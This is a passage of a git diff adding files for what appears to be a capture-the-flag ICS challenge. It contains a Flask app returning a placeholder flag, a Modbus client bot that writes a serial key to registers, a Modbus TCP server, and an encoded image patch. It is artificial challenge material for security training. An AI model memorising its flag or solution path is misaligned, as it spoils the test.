render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_ON')) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF')) + +@app.route("/power") +@auth.login_required +def power(): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ERROR')) + +@app.route("/rate") +@auth.login_required +def rate(): + if session['granted']: + r = random.randint(1, 10) + return make_response("Gamma Dose Rate : 0.02{}34456{} uR/hr
{}
".format(r,r,'HTB{this_is_a_fake_flag}')) + else: + r = random.randint(100,10000) + return make_response("Gamma Dose Rate : {} uR/hr".format(r)) + +app.run('0.0.0.0',80) diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py new file mode 100755 index 00000000..8a334914 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py @@ -0,0 +1,29 @@ +#!/usr/bin/python3 + +import socket +from os import path +from time import sleep +from umodbus import conf +from umodbus.client import tcp + +conf.SIGNED_VALUES = True + +#Populate coils data to default +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect(('127.0.0.1', 502)) +msg = tcp.write_multiple_coils(slave_id=1, starting_address=1, values=[1, 0, 0, 1, 1, 0, 0, 1 ,1]) +tcp.send_message(msg, sock) +sock.close() + +while True: + sleep(2) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect(('127.0.0.1', 502)) + message = tcp.read_coils(starting_address=7, quantity=1, slave_id=1) + out = tcp.send_message(message, sock) + if out[0]==1: #push serial key to the registers + open('app/.conf','w').write('') + if path.exists('app/.provision'): + message = tcp.write_multiple_registers(slave_id=1, starting_address=15, values=[44, 21, 90, 54, 76, 82, 11, 20, 37, 64]) + tcp.send_message(message, sock) + sock.close() diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py new file mode 100755 index 00000000..f40b6c18 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py @@ -0,0 +1,31 @@ +#!/usr/bin/python3 + +import logging +import json +from time import sleep +from socketserver import TCPServer +from collections import defaultdict +from umodbus import conf +from umodbus.server.tcp import RequestHandler, get_server +from umodbus.utils import log_to_stream + +log_to_stream(level=logging.ERROR) +data_store = defaultdict(int) +conf.SIGNED_VALUES = True +TCPServer.allow_reuse_address = True +app = get_server(TCPServer, ('0.0.0.0', 502), RequestHandler) + +@app.route(slave_ids=[1], function_codes=[1,2,3,4], addresses=list(range(1, 30))) +def read_data_store(slave_id, function_code, address): + return data_store[address] + +@app.route(slave_ids=[1], function_codes=[5,6,15,16], addresses=list(range(1, 30))) +def write_data_store(slave_id, function_code, address, value): + data_store[address] = value + +if __name__ == '__main__': + try: + app.serve_forever() + finally: + app.shutdown() + app.server_close() diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png new file mode 100644 index 0000000000000000000000000000000000000000..87d3ec57c7d0e2f7ff59e31d9371995cd702655b GIT binary patch literal 84266 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 